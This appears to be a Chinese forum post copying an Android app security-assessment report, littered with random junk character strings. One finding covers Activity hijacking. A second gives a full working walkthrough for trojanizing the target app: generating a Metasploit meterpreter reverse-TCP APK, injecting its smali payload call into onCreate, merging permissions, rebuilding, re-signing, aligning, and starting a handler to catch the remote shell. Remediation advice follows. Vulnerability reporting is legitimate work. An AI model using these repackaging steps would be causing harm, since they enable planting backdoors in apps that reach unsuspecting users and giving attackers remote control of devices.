% |3 T) ?7 o7 z) t& y" N9 K7 h- v8 H5 u; a6 d5 }) w 2 检测结果                    & ~5 q5 q) }1 h0 j- Y 3 t" O) i+ v n/ q% ~

% D: D5 L2 o6 j& K : e1 e3 a$ {1 t5 m- t8 C7 Z E. R

( ^! g7 w+ u0 X1 g' |7 s- O8 z/ P) D1 S& b; p0 ]; M+ N 2.1 某某某 - L3 o8 f- E7 ~) @) z$ m9 ] ' I$ `' A' n F, o

# Z1 Y( v: |* M' V - d1 ]# w* T+ Q l: f4 \* I/ S

g# M9 ~5 Y2 r( X4 w- i : H- H& q: m" g% p 2.1.1检测目标 2 f; M9 \/ D. G! Q 9 {6 W( P5 q) \0 ?, U

/ D4 ^$ k3 r. `. K/ h ( T5 j0 J6 _ i

! \7 ?& W" f) ]2 R9 r ! p! g1 w+ C( a* b# I 目标地址: 某某某某某某APP 0 t) | q& V9 a% |/ P- b% y% x 2 } w/ a" N/ K6 Q

2 C6 M2 Z% w8 O' u+ b( l8 i" R& Y' p 1 q, Z) s" `/ ]

0 p- g5 ?* y8 U. T/ a3 }- j" N- p% @/ a7 z3 C9 B& } 2.1.2检测结果 3 r7 Z1 M& [$ F# W3 d8 x ) N9 b) ^% D* ~4 `3 q

: V' [2 D! R* O! n) V { " K& l4 a8 X! J Z4 Q( w4 j

6 G! ?; {0 ]3 e* s8 ]3 p x! o ) d/ T) h* ?0 ]* k4 N 2.1.2.1 7 ~1 j" O0 ?" |9 H% Q 8 M0 w& `0 R% C$ V3 Y! K

$ X4 Y U2 C7 ]- w1 X& O : R) t. t4 M m* t. d

3 c0 l3 k- `" W# q; v% L" b7 X 9 i' Q! M) K/ v2 F0 q" l9 j 漏洞链接地址:某某某某某某APP ; n1 D2 V: _* n, X' c) ?( D # f$ d+ f, q8 N5 D

* n; k( r: S/ _' p% @5 W 7 p; M# J+ _0 x6 I& a i

4 _7 k- A5 h6 I8 r # x9 u* }5 y. u4 f2 y3 m% O9 ]& }) U4 M   6 }0 @+ {5 y5 k' C2 L4 S( i ; i7 Q+ |" [: l! p( `) ^. Q

" B- i+ B, B( U9 E7 A: r' h6 @4 f: V0 b8 G Q# N* }$ `

+ E- d5 X! v& F* e c; a3 G- R- O/ E1 z- [: g( ] 漏洞分析及取证: ' I1 x- ^; h( w2 K9 ^$ ] $ a6 T3 f# ]+ \6 o, P; i( e- y

6 n w! b9 _. A9 p& t" O: A/ I& {/ H* O: R% z: o+ N0 l; B) F: Q# `

. C1 Y7 d; T. A$ N. i( O ) G! f0 y/ {. [. A- L% `! y# G                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: 3 J+ D' y: V( a4 W4 l% a. Q$ k5 b+ I$ {/ `7 ^0 K5 P1 d* [

$ l2 V7 k9 r2 z2 u6 a6 q" f1 g( I' e, l& g$ p. l! ~

- J% K$ T4 s2 c- G$ n2 R: `8 ?3 @* L" ^4 v      , G6 s9 S/ w& l) ]- @* e; M O* T5 k2 U- f3 G3 x) r( O6 S$ p4 `

+ L& O# i7 F' C* D9 r4 u5 C, P ' A% W) {" V. g7 B# H. N# l

. Y1 ?- c3 z# k8 U- O ! B$ F8 t6 i0 K* Z( n. Z) _                       ' z# \! P0 I. ^3 M3 S 0 f2 h6 v4 ?! ^5 v9 C% V* Y. A

& H) O( K( a6 M5 |4 ^ # p" s8 e) k9 s3 Z0 X

' e# O) [. \0 w: A) L5 L # G5 E1 m0 |8 w h8 A, x : E% g& n# d' ~ 2 j" ]3 {; P. K2 ]9 y( ^

' y/ k% D0 j* z & k' h' e1 J) A; J3 B* }! v

! |2 ^2 x6 H! O3 f# X * A# S% t7 Q3 e8 B' a w7 r" J 7 [: A7 a. J3 j8 q a& q& V+ a2 v0 O( ]7 S; t

5 ]' G. u( ~3 V. b1 O c ; ]. c) i: Q1 f, Q: e4 p+ ]# C

/ z/ W- N; x+ y. A: R3 ] % e* ^+ W' _' `7 J6 | 7 _2 [& j* ]9 y) K; K* Q " ?: m8 U8 k- T( L' U) k; o0 Y

3 n2 A2 d4 Q8 p2 U6 x/ R1 _% Y + E [2 I7 F7 }

- ^4 p- u |6 z v+ f0 p# X! {8 Q2 o' U& q3 m 漏洞危害:高 1 W6 b- T! S: f5 D( Z; r 4 p8 s6 }/ P5 M( G

; k% `$ B3 x) x- R( {! z X3 e- T# s' a! F& D# U0 }3 U8 C$ X* l
$ l% s# `& G+ |1 q5 B $ p- C- _* Z+ P6 B2 ` + e# |( i* z4 C' U9 k* Z" f% G+ s. ^" I* B/ }0 X: D1 S6 C, I4 l X0 |4 P& F. w" A! e1 @- g6 I! }9 o* r& o) Z5 D$ H U+ o( f3 t- j8 L7 ?; R, j8 D- K3 S7 }. U1 @( ~( }8 X2 c) L2 @# B; i. _ h0 B& |: ~* J) R/ p& X5 d- Q# J; K% \( e$ b+ W! m" U6 b% Z% N/ ?9 o4 Z* t/ _; Q: F) L% l9 W# _, D" P' s5 j& u. \' c/ v6 l/ T: F8 k, E( E7 g( z# H! R' y, b5 x6 T& p7 |5 P' ~2 D" F8 A) n4 Q4 W. v! Y) z# M# A7 v4 `, l' r6 l/ R# t0 ?! a1 |% s! R# n' W6 x7 j# q l; H7 }" n6 l8 F, M& b, E( A; |. u# c6 J2 ?5 O2 G4 B) c. H# ?6 D. K4 l1 ~8 O, R5 D @0 S' C4 a7 T8 M+ [% |& d0 d4 x4 j) N w H5 F3 O# H" x ?
( k, R7 V: }) I' U4 u 1 K- U+ Y! g6 t% }. r

5 R6 p) H4 \1 {' a! c- m6 ~( y; ` 严重程度 ) a v% S1 k0 l; \2 {! r " T/ s$ n t( v' D6 {

# ]6 h+ f1 n2 K" r0 o" N B% a/ ` 5 ~1 [+ Q) Y* U D& c. u( O* z/ Q$ F
; R/ q3 \. x& j5 \- ?4 l# f) j& t( |

( l- y. z, J* _ }1 W$ p [1 y! ^ 1 @+ T6 l! E2 c3 W/ H/ {' z ! O$ w/ O5 v- J5 P8 p# S, z* e+ R6 ]" ~" ~+ S

, D. I+ B' T8 j8 ~/ I) p" ] 9 c" y4 d# {: U: K: Z! ]4 A
7 e6 a. z8 I* V9 W, [) c 1 W7 R* z( A a! l

3 \; m& n7 u8 v$ V : y" n) h9 e+ m& c/ g ' ?1 y" @% p- ~' P! \ D7 [3 h. }, q+ ^: Z" {. _& g

0 J1 o* y) G% o ' u7 I1 y' c! P6 t0 L
/ l4 G6 @1 J0 n0 @) d# _5 K9 _: L : V$ _" d9 j* h) o+ g5 @' o" T, h

4 Y% ]4 o/ x/ o" ?; w4 P, | L$ ]+ a9 c8 k ) o5 E% j G+ F5 p, \8 [; C( l0 l) B: {

4 V1 u7 Y6 M* ?8 Y5 { , N+ ?4 \/ G ?/ f! a8 Q; `
: y3 w* l' C" l* Y1 k 7 t: B( \. R) ^- I/ g

, g4 o, V( H- S/ S ' z# R( C% R2 c   : x8 Z; |: m2 ]4 ?6 `# N' h c 3 i O5 J! ?) q% M: Y& {

( N+ V* }0 x4 {' e s9 A( ]! I1 b 5 T( k2 _) K( V2 P: I% X
( R; K, _. [7 D. t+ \0 P . S; @6 ], w: I! s5 O2 D& g0 U2 |, |1 l

& B' ^" g# E [' {4 m- R ) C, u$ Y1 c2 s/ Z# ~( x4 q1 l6 e ( Q2 f6 @/ z: ^ * W1 x, e$ e! z$ L+ T+ R

( Q- N2 @) R* D% F% y $ m& K9 O. [; d1 K
/ F! u/ i p5 H8 G ) H. O! W+ q+ r

* |+ O- C3 N9 J: h$ P$ o7 J, g2 u1 O2 a5 q   2 H! U" x; `* y) G% d! I0 _: t3 P$ y- I0 m

/ H( j( {; x' n2 x: A# J- V6 W$ G8 F- n! D
8 V% j) n. Q0 D9 [2 E 9 Z8 V7 u; |) J# N7 v
. v$ C' t; P6 H% T6 E ^4 w: `- C' z8 Z3 r

# l; D) w! r9 Q0 H4 m4 U; o6 i' Y, i! Y# V9 c   # a- X; n- x8 b. N5 U) p& H- V% b + ^2 ]9 Y9 X0 a" D) L) K; M6 U

, W3 {0 i" f; B' b8 X $ P6 W, O V* h# C ~8 H# d

; G" c. m. r; Y: n' K , u4 R- l# a5 j. s4 i 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 . J# s8 }% j3 i/ ]2 f$ j" s % [: t+ ]8 s* M2 y I

' {* V ^+ v( C& V % n+ G3 [% D8 I) d4 j

) j3 }. [ h7 k 8 H! u' g( B, p! Y, U" m2 P4 b           " p3 y' `2 B2 p! @9 g' ~ ]5 Z/ {2 P7 x3 J5 _1 C; p) ?7 n

H: Z% J3 i' ~ 8 A. I. g. t9 O, b/ w4 R, w

0 v- j6 p; Y7 _# Y/ b+ e ; i0 V- ?! S" ]1 _& ^! h/ j2 f: i   9 I' n0 Y! o) y : X9 O0 H: |. X2 p

6 b# ]1 i* e3 @$ u# h6 {6 j& I- ?8 \% r, w

- B0 U0 }9 G" v3 B 9 v2 ~+ `+ s; y9 m/ g: i" l$ y 2.1.2.2 ! A" B/ x7 `4 U0 S: \9 ~& ~ 1 ~& }+ H' N5 x3 N! q

/ w/ n0 ^+ C3 X+ t. w$ k & ]" X6 i, S$ ~- h. ^0 ?6 h# X

( x! M7 d7 ~2 V; [+ R8 O) y: }1 G & _$ G& z G; g: q6 \ 漏洞链接地址:某某某某某某APP 2 b0 `! I) N" \ I/ t6 X : d& f# w0 L; Q5 ?6 Y* H% W

6 I' ~* N$ Z; `! L 3 L z' _; n" r: Y/ Q+ K

- Y& g" X% ^& \ ' t: L9 Q8 [3 l 漏洞分析及取证: & r; k4 d. X3 R& g " K% b9 K0 n4 ?! r; G; F$ C; V

) { b2 c! w) |5 J3 ]; a5 ? g/ `/ B

6 ]; L. |' q7 K8 l8 w + @" E: o/ Y5 X$ n                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: , H) u3 H; j4 N( o / J& v. S" p& E- H

# e! T" |6 q$ v8 h9 b! y: }# O: N % ?2 m! Q0 Z( t8 M, g9 q

5 h4 M6 U" w7 m ^! _( b4 Y+ x. r! W, I9 F- Q6 A& z) k Metasploit 生成木马 apk . V$ e9 L8 C: ^. O" t+ W ) N( A. F S' X7 [% M

8 a- A- D2 J; x7 f4 X1 T! | 9 n6 Q; d2 F+ ^* y+ }5 ~/ C

4 k3 u+ N0 c2 J. y . f( a# J9 u" t2 b msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk * ]6 Q5 ]. Z$ x% T3 B3 a0 Q' j* J/ b3 X. z5 \

( X5 ~- C2 u( M+ \3 y7 w* E & d3 d/ O$ W4 ?) m8 T; B/ [

* \* D1 A8 G& ~* Z! e& u8 e8 W . g1 n3 P, v7 T& N. P 反编译目标apk和木马apk 5 J l$ f5 @: h# G7 w& J, h* } r2 h; J

) e; N+ j% I7 o# `. p$ D9 ^+ O/ v$ i/ l3 c; t) ]: \

' [0 N$ \6 ]6 \7 h6 g- y+ { $ I5 x8 N" z6 w' _! n, X apktool d target.apk
: z0 d3 o' {0 M- d # l( }5 }8 ^1 \ J8 [0 w apktool d cockhorse.apk
6 c" n u t: x. h, s5 K5 d/ O. S3 h5 E

6 K* U1 _% c2 |5 {2 @4 u# B $ p- i& k* P; o. O, K9 v) `

" _# z7 |$ A* t& F2 \6 z* J; Z- f $ b2 R' q& ? p* ]! o0 `+ n. V8 M 木马 apk 注入目标 apk ^) Y- z$ F; s* o3 r) S 7 [4 w# B9 q: m& \: c( f- q

! t$ v8 D: {. C6 ?) p2 N3 {/ c$ H) f 1 w3 }1 u, X& ^; J) T$ a

" V" }! ]( `2 Z: ?2 v, ~4 {, v, T9 g 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
4 p) @# s) n( @$ W& r2 T ! m+ M9 H7 q! i0 s' j invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
2 e5 w! h0 A3 C1 v8 \' | ( t8 k9 J8 u# a2 k# k2 o: _

" X9 R- y. x! H: J, v# {! C! ] - B9 l8 ~6 `: {( K# C

0 I- F3 H" L' h1 S; P5 Q9 b3 f + [# J: L# _' h0 {4 j3 o 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 * _5 P t" z1 L/ o 7 r6 C9 l9 ~; K4 U$ v

7 H2 v( v/ Q2 `8 ~1 R& x8 s - c; m( K5 J: K" E

, K; M& a& t8 s: e5 k 1 @! }, x/ U# t' p( H0 _ 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 8 L: e2 y1 n* R + h# }% r9 Z6 H) N9 o

; j: [2 Y0 C% C# c! a 8 t \' K2 @: [+ U5 K1 |% k

6 _# t" M. A3 G! E# a ; {9 T) W1 R4 M c7 Z) H 回编译生成最终 apk / x4 Q+ q, P q% ?' \# s- C+ F s9 V7 N) u" C/ U2 G- _. g

5 `& z( a/ M) X3 E, \, W) W! [# D3 L8 _8 n

6 Q& h: s- q" M: Q9 x( Q : y$ u* F# a+ d8 V 重新打包 7 R6 v( J" R8 i2 n5 ~" r " F1 n! Q) F$ S _# t

4 d8 ?: @: j# b$ H5 N' W3 ~5 x/ H& K- K2 t3 K1 b' n/ S: Y1 J/ n3 |

7 k# o% r. G% h- K. }7 P 8 q' ~ e1 D" {9 B" h% ?5 y- ~- B" f8 a I+ { apktool b -o repackage.apk target_app_floder " @1 C8 n) s- i$ { 7 x/ a: H0 e4 i; N* ]: x) u7 l3 @3 u/ N

9 b% U0 q7 z$ z+ b- ] $ t4 Z$ u. t5 F4 `

5 {/ j7 _- ^2 I& w ^2 a- z) J0 K; S, v" N2 ] 创建签名文件,有的话可忽略此步骤 # q8 F" k, w# V5 l 8 K+ J( D( i0 u8 Q, b2 D f

5 I9 w& ~$ Z* _2 r; e8 i. ?, |6 e; R3 [- Q! d- Z# F

- U8 y; x7 S/ ]& w+ s % @, @9 i, m6 r9 H keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                6 A$ O" {/ X8 Y 0 f5 S& [; t2 Q/ e" u- J( A+ N( ^

& ^$ z U" u& X6 Y ( P$ G" s! V" R1 }4 Z' v

- ^! V6 h9 |8 |6 m& B , W! O* v4 Q: @6 N! ?( E 签名,以下任选其一 % A5 ^; |3 g: V, T9 r; l2 I6 Y. y8 l, k $ y4 Q& m. p: W" q) y

7 E: C# u, v3 p2 e $ [$ c g- @4 ~

% f N/ X. J* f( M+ M( f 6 w% d+ B. h. @* r jarsigner 方式 # O- b& d T- p : @' o' Q# x. M" _ C

% @) N- g! C& }! j1 @ \ ; Q+ V9 f# x2 I* c2 e9 Q d# p

# D! ~) ?( e+ i6 \* R - k# J* U' Z" H( ^' R5 _: {- m/ n jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname $ k+ y+ l. T, G+ g8 x: }5 o ) ~% `' v; i% f, c' c) _4 O

% C. e' i4 o$ [& b4 z% l! w) k; E; {

0 \7 v F. S% x' a4 I" ^: W3 w : n0 ?' v& ]0 X0 O0 W apksigner 方式 1 D8 m* S! o7 W1 O% h& Z9 U- \. m6 A* `! a

: W% N. x. n+ B0 \: \% C3 F1 u " |/ m/ n( @( s

! j" Q/ H2 i& [) g$ s( K $ }1 Y0 t! ]7 `/ N( x apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk 2 t; y \! [9 o& E' U - X' i8 W# c" Y, u$ ]% r

; k% k$ R* I7 z; ?* y/ E * e6 \) Q5 d3 x

& j& f7 N3 {8 }: o: s# { 5 r9 f3 t6 I1 y6 n 如需要禁用 v2签名 添加选项--v2-signing-enabled false , w+ a% o2 o7 A& A6 z* {; e7 {, g5 K4 R

8 g& i8 M' x) Z8 @# Z, r4 _! A 9 s' B+ }3 h0 f/ b

9 d0 L+ T% f7 s+ u4 J' O! f % y; H8 Q* h# a1 u; o4 k 验证,以下任选其一 * p2 t- q1 V! \8 ` }: H2 t # N# E( X' u$ h) s. V3 q! M4 K

: u) H6 K( X! @8 d; u/ O3 K1 q' d0 d5 G6 }; N5 h

8 G6 u# L! }. T- L& S 4 N4 R+ A, S- Y' y2 d+ [ jarsigner方式 ! P9 J: A+ ]5 E% J+ A7 ^# @4 l ) e) y" K; p. @6 F+ [0 [% o

2 e0 {+ X9 ^8 x" D- a, p 8 j4 T8 b6 B' {# R# I" {

$ F; G5 C3 E# a* y( @ ' N, ^# }7 p, Z, l# X jarsigner -verify repackaged.apk 6 @% i# S8 g9 {, e* C! Q6 }2 p. J8 ~3 }& i

$ ?! S: j; `0 Z( i' _8 F j1 u 5 \# F9 [: y, s. j0 y

3 I( c2 e1 ]$ [9 Q1 ~2 J3 X" Z6 E 4 l6 k' m9 \$ m8 o- t apksigner 方式 - w8 K k( O4 r |* D+ C$ v7 I7 c - x( V1 p: i- p" I$ v8 m

& I! a7 { @4 {. [9 L) b; e& x& R1 u4 B# y& i9 d: z

* x6 K8 i/ o5 d3 M! L 5 N7 S9 s. N4 q- e6 V0 r+ Y9 M/ x apksigner verify -v --print-certs repackaged.apk 1 W _: U6 a/ q; J! w7 [* O4 |3 D! S

% Q" p: J4 q7 W5 W$ h; S$ `$ G: r8 `3 y3 E3 S+ s

/ t6 t% O& l- L3 f5 j! } 7 Z& T6 _4 o" B keytool方式 . D$ B; F# e; S6 Y) s& D 1 [0 l" w' q% X8 k E+ \, ]. ?

& e4 k o& _( Q- N) H+ e) r3 E , u* ?) q+ P$ H6 K

9 ]% N- r* q$ V# Y+ r2 F6 { 2 d$ K4 K' ^0 T* m; j0 G keytool -printcert -jarfile repackaged.apk . k7 W, d0 I4 B$ [" R L8 R/ x+ n, y7 l6 E$ m' R

$ Q2 D) l& E& @: M) G, l# b( j 6 q3 y2 }) P( W2 E

, U, V4 Q' d) i. y3 z' K0 V2 ? x0 r) G- y/ i+ R 对齐 / K. d! S% x3 {5 F! ~" b) m " E2 I# K+ t" N& G5 d3 L5 c

" j2 g( W) T s) L* s' W8 e: i1 ~0 x/ v2 b' d

/ H6 I- v; B7 l7 S7 I 6 E! O3 O) m& I: d% L8 X! a2 \ 字节对齐优化 ( _/ N& _% \ q - _9 M( N. n% B% p7 z+ m) V

I, f5 L$ K# \: f ( x! L7 F$ t2 H: q2 f" q

2 }/ h7 h9 q1 f4 _ * {1 w* p4 u1 q, t! t zipalign -v 4 repackaged.apk final.apk 8 x; Y1 r) ?' n+ e- Y. Q; S $ _* T, s3 m! n! N' t7 J$ ]) Y

% F6 B: x2 L3 I% x 9 [% ~% I! M6 T4 I

, U7 U/ E# [4 v0 N , ^% m. A# t6 I& ]4 e 检查是否对齐 & c( D' f6 w$ M9 R6 H' w/ _4 ` - t8 |* R( ?, A

+ i! L& f) \- W3 q5 ~6 t( }/ N0 M0 a. Z6 c& h$ T- z# o# |' O

% T* S5 S, l, ]$ l' v $ U/ w( {9 P. m4 i' H4 j) R( g; ^ zipalign -c -v 4 final.apk 9 G2 m0 T. l: t9 k, b7 u6 z# R% b, E- l( k6 V

( L; d7 d8 o0 K0 J' L* w$ \- C! a; Q/ L: j

4 ~* g0 e6 ^5 o( A / b( w9 O& ? J9 |4 G, N; c- c: l 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 6 w- Z. ^) U/ k" M4 P0 b/ ?4 R * ?4 \( r H+ C

- w1 O% B7 L/ G, R3 I3 {; X8 c) J : @* ~: k+ y# \3 q* o" k+ P( P& t, P6 I

" x. c% P- U, N ! }. q. p0 H8 o. o* _" w 启动Metasploit控制台,配置参数等待上线 O; r7 ^- a) {6 J. v. [4 ?& L- H8 y0 @ 0 l. W% B+ g: W, R

y! m4 q0 L- V' t6 n& y. A% H; E! J( p. X3 H% @7 t$ p4 Z& ?

1 i2 t# e! M+ r/ r2 t m/ |, }/ L$ B' E; q 在终端依次输入如下命令 8 M& @2 l- H5 g" c& B + i7 {1 U1 h% X0 y: J: |+ R

2 U* J: i7 P2 X. I4 A) S. y # K; z- \( c/ C% F

# Q! O; H4 F+ o1 _9 u) v ( R% p' T& S9 D! K" ` msfconsole 0 ?( A9 h1 a$ w) O# _, J7 v - L) O6 R: g% j

2 }1 j! k3 n( p! P: S# S' ~ & V, |# u* P& V* N; h4 ?

- k& n+ ~ y0 f( S3 e8 @4 f' o4 \: n+ w4 |0 X6 T s& H8 L use exploit/multi/handler 0 n3 P M% U# ^8 r3 Y / M! n6 g8 t$ o* m6 A5 n1 ` X, J

% I9 S4 s0 w8 D0 O( c! H5 A" z 0 V5 U Q" c6 ?" Y. H

1 e' M5 T* `$ b, j F. K) J1 p7 j' e5 i. u2 X: _ set PAYLOAD android/meterpreter/reverse_tcp ) l+ _3 g8 m$ } ( u! i* X D" r

% ?, O4 b; Y/ W ' B3 D) d! F6 u" c+ G

& O9 q$ p6 l- a: W" _- Q! { 1 A7 v, X+ B$ n2 C$ J9 w0 K2 _ set LHOST 192.xxx.xx.xx . [& i) g2 c: D* H# ? 6 _- H/ k% K1 |" p5 D1 o5 a

8 W6 ?1 R( ]5 T: Y2 F7 t. Y2 K s 7 @+ i3 p2 W( D) F

( q9 n6 u6 B. j - N3 G' }1 ?7 O+ n7 ?% a% n8 ^ set LPORT 4444 , s' H$ v" X6 w, ~8 e2 \4 {( x2 \4 u. f b7 \

$ C. B$ i: U2 d6 }2 o0 o- J3 X& ^2 Q) n5 F* G

0 P6 l9 y* z0 _+ r' m6 u& V1 P8 v1 W) c, R, }5 I. K exploit ( c: ?9 o' R4 u$ G 7 O: y3 z1 O; {2 u

5 d4 W! X0 @, O& a# t8 Z 0 `0 l& A' z4 }3 f) J A

; f5 B" O* Z4 |; I7 v* Y # y" T9 I4 P! X- C 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               # B8 ]5 |6 R' p9 n# i0 Z } 7 G* D$ X6 w( Y# T3 q1 f

: s: N- a0 O0 C0 o1 L8 T 9 d5 c% E) \. C% s9 X9 Y

( X! k$ F1 ?# S/ E& O9 O 9 B# [- L R X2 U/ A 漏洞危害:中 ! O: [% H7 m# ~& a $ w& B% N6 D$ O4 M9 h

; B! o. j5 e! i: S! L8 ? 2 U* u! v/ a$ T8 \. R
, I- d+ A1 `( c & E2 l) ^) q* }3 x" i) N6 x$ V* e 7 U+ g5 A1 i3 b/ D . L) E) _ ?9 ~/ h 2 Z ~) e }# J5 O/ ~: M7 \* t+ P/ c3 q D% m4 t8 Z0 I* ` g+ V; R; R, G5 y _; h8 r) L$ [7 a9 j. a1 B+ S8 T6 F8 `* Y: v" k- c# R9 ]$ Q# v* S* z4 D% v% T1 J9 m3 Y. f+ b* u5 I) @% ^. s# |6 P- I1 M. [2 E& D) [# z: y4 E8 h+ Q' J& a" a% y& [/ f4 E( n0 ?2 x7 m& f ^8 @4 r. I9 \" v Z0 u1 _, q; W1 {; X( I% _5 z7 q, S; a- Y f$ `; b4 D" t l& C" r4 R n+ l- R0 k9 t5 S# F2 B: i4 r9 t' e$ E; c+ m1 J; @9 n! V% ]5 ~' N8 j& t5 c0 G! j/ O8 n7 F- T& g" M* ^3 f$ ^! X, T7 S& u4 `. o. c' R" }4 @1 M2 Y6 C) N$ r1 ]0 Q: v9 g% z. G" [ }5 y3 X8 g! ?3 c' s8 z7 P" h. E% h, M- L) p$ ^0 i6 o5 I( U6 M
# n/ ]6 N: T( P5 U, K( g8 y5 J* Y! l. k0 q2 `& ~

$ g' p5 ?1 X8 A- }$ C% ~ " E. d* P8 i2 k8 {5 R- s 严重程度 - r% ^. K6 ]1 e4 |% [6 g) @! i F ! V) M( s5 c0 i# E8 a# v

$ r4 ~2 q/ x+ f. I9 q0 L/ ]& J$ j0 l9 x ; c2 Z% M, t) Z" [ `8 @
; p& V) ^$ L$ G7 I9 z7 E7 {3 {8 s8 C3 A5 b, B+ x; a

9 a0 ?. h( N. b. x+ `( p$ ]/ [" r* {( o0 t7 U* P4 y- N2 A9 G+ ] " j \) l0 J; N1 f1 x; e2 z " K% j# {( J' T$ l

% R+ {% ~9 Y4 H s, R/ t+ {: M8 r: B7 p% U
1 [1 o1 `# e0 t% S% }# } & R' H4 r& ], ]6 [6 ~/ T

, B+ ~2 v9 y6 m/ K w( I7 Y* ?6 M# G1 A% Q9 F. r- ^ 4 U/ H( F# f1 X( G6 b" q: B1 J. [$ l. W \) s E! a; W

! r' o! _5 ^0 F& | m! C& @ 5 R: `0 y' `; q" m) _- v
~2 H3 {7 E7 m$ u A! I' h 5 \' F* r" ?5 ~( U, v

- E( E9 v' W1 \+ T7 f4 i 8 r' n& s$ |+ Z8 F* N ) `2 U5 Z+ X6 Y. u, Z: Q 5 Q, C6 q- N6 X4 D& o+ T, a; i+ }

5 V$ G+ t1 C6 k, L- e, A K& N2 ]( F: r0 F0 W1 u* Q K
+ O5 {3 x9 U8 y* x. ~2 D+ \ ! K3 f- x3 h+ [& z! d0 x $ ?6 q* U% z# ~4 r+ S* q% G7 m8 R$ [ " b) O) J. s& f S3 q9 Z$ t, H

) d/ j6 _) m% ~6 Z $ N d1 G) k9 W4 q   3 I4 L5 N/ g n3 F/ l 5 u1 x" p# `* ~7 c) y5 j

5 B5 P; j; D. J/ }1 i6 ^. o$ G 1 `' r; V" T+ u7 H2 I
% M% c6 v+ |7 G& \# d: d: @% u" J % Z7 C7 s* D1 X+ d0 N- R$ J$ T

' ^$ E p; K. [) o% S# o' h2 Z) Z% B ' d$ U' ~) m) a% } i/ g / M; q9 G7 \- m' i' u( g5 l1 D$ z0 i4 r' p2 `+ G; N. ~4 \6 v* j" ~

4 h1 T: Z3 h) q7 n. c( \* T \: n: q( f' J
3 `" Z* k% l7 g5 I. e- J * y% t" K1 k+ Z7 }" _. {6 Y) H 9 m6 I5 ^* P$ y8 Q . G& ]/ ^9 T9 G. I5 s3 O2 P/ x

4 o/ @/ I6 N% X / }$ V* l9 m# W' Q6 A* f% ]6 A   N9 R- S7 W" G- q, N2 |, w- n! F N7 U/ \7 C) }7 |( ~

: t1 D4 h4 K0 J% r9 I! N$ c$ S; \/ u% c! H1 |/ H! {+ P
: F L' R% ?: u$ ?3 [ + o) H. z- }5 V
. } L1 y- U0 j9 B2 m. z( @9 |8 ]# f7 n8 F

1 P3 x# |8 J2 B5 {. M( |4 f 6 f( @- [1 l, w0 g# s9 B- r/ X   ) M. i- Q# ^1 d + X2 z/ `2 u0 g% k: {& W

6 E7 w6 S v' }% C1 {# L$ ^6 ]" _, x! m: v u

" j: g5 L. `( y6 W 8 O& c4 u! Q6 ?8 ` L! `- x: m( N 修复方法: & p* x' b# W3 K+ `# `+ E& O * ^# T- N$ f5 D4 a% `

' _, N4 v* Y* E/ P# E; o! `. }$ j' U& T: Z* ~/ @4 i

0 J1 F5 T$ P& [ " s1 R" _9 O8 @. d               1. APP 启动时应做签名校验防止二次打包。
, ?. q5 C1 h7 ?) W " Y. |( m0 G* v 2.
建议采用客户端、通信和服务器端联动防御方案进行安全防御。 5 \9 Q2 P: h- w- O4 C) r # U1 o# M0 P1 z/ U6 O' H9 {! E9 z

! o# T3 W- k! c6 G# \ R+ A , ]9 R9 Q+ n1 d- [6 O $ j/ n5 m, [; b( `" S! O* u# a" Y( G5 R G% W

% _5 _) H x( g) n5 F5 j. u ( t x# T* d5 ], O# C   7 @, ]3 A" w2 J( N1 b, a9 B- k 1 H9 ~9 o( I; k( J

6 b0 n! l. L3 h1 V) A ; m" U) Y% _' I+ F1 o3 n ; w, A9 W) {0 Q4 z9 B8 J2 \" D5 l. }6 D1 N' R$ h

' E. i( F/ o) Q0 O* H3 p % h4 F4 ^5 _8 ~2 x6 U
' B1 J' z+ C' V7 V" Z; y3 [2 E# D: v- c; z

" T u( H& A- G# B7 | . A- B$ Q( D/ ?$ t3 q- F* S
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表